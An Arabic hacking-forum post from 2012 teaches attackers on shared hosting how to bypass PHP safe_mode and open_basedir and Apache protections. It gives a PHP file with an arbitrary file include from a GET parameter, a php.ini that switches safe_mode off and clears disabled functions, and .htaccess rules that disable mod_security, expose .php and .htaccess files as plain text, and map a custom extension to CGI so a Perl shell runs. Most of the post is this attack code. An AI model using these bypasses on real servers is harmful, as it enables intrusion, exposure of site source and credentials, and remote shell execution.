عرض مشاركة واحدة
قديم 12-31-2012, 05:01 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
ReD-HaT
~|M4$T3R|~
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو









ReD-HaT غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ReD-HaT is on a distinguished road

افتراضي الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز


السلام عليكم و رحمة الله تعالى و بركاته
أنا جمعت بعض الأكواد ان شاء الله تفيدكم
هنالك فرق في التخطي
الأول هو التخطي السيف مود و يكون في اصدارات php
مثال هدا الكود في ini.php

كود PHP:
<?
echo ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
$_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo 
ini_get("safe_mode");
echo 
ini_get("open_basedir");
include(
$_GET["ss"]);
?>
و كدلك ملف php.ini
كود PHP:
short_open_tag On
log_errors 
On
log_errors_max_len 
1024
ignore_repeated_errors 
On
register_globals 
Off
magic_quotes_runtime 
Off
magic_quotes_gpc 
On
allow_url_fopen 
on
AddHandler application
/x-httpd-php4 .php
display_errors 
Off
disable_functions 
Bypass By ReD
safe_mode 
Off 
ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
لكن تتخطى في كثير من الأحيان
نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
نسوي هتاكسس و نشوف هدا الكود
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule
DirectoryIndex seees.html
Options 
+Indexes
AddType text
/plain .php
AddHandler server
-parsed .php
AddType text
/plain .html
AddType text
/plain .pl
AddType text
/plain .asp
AddType text
/plain .htm
AddType text
/plain .shtml
AddType text
/plain .shtm
AddType text
/plain .htaccess
Options all
DirectoryIndex Sux
.html
AddType text
/plain .php
AddHandler server
-parsed .php
AddType text
/plain .html 
نجي نحلل هدا الهتاكسس
هدا بيتخطى كثير الفوربدن
كود PHP:
Options all
DirectoryIndex Sux
.html
AddType text
/plain .php
AddHandler server
-parsed .php
AddType text
/plain .html 
أما بالنسبة ل 406 not acceptablr
فالحل هو هدا
كود PHP:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule
أما Internal Server Error
فهدا الكود بيتخطاه
كود PHP:
DirectoryIndex seees.html
Options 
+Indexes
AddType text
/plain .php
AddHandler server
-parsed .php
AddType text
/plain .html
AddType text
/plain .pl
AddType text
/plain .asp
AddType text
/plain .htm
AddType text
/plain .shtml
AddType text
/plain .shtm
AddType text
/plain .htaccess 
اه كمان شئ مهم
مثلا لو أريد تشغيل البيرل كمثال في السرفر
رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
مع انشاء ملف اخر بيرل يكون shellperl.red
ما الى هدا هناك طرق كثييييرة جدا في التخطي
و ارجو من الشباب التفريق ما بين هدان الأمرين
والله ولي التوفيق
سلام


hgtvr fdk jo'd plhdhj php , apache o'H dru tdi ;edv lk hgi;v.

التوقيع

Vbspiders For Ever

mess with the best
die like rest

-----------------------------------
kevin-ffts@hotmail.fr
wep@hotmail.fr

 


التعديل الأخير تم بواسطة ReD-HaT ; 12-31-2012 الساعة 05:05 AM.

   

رد مع اقتباس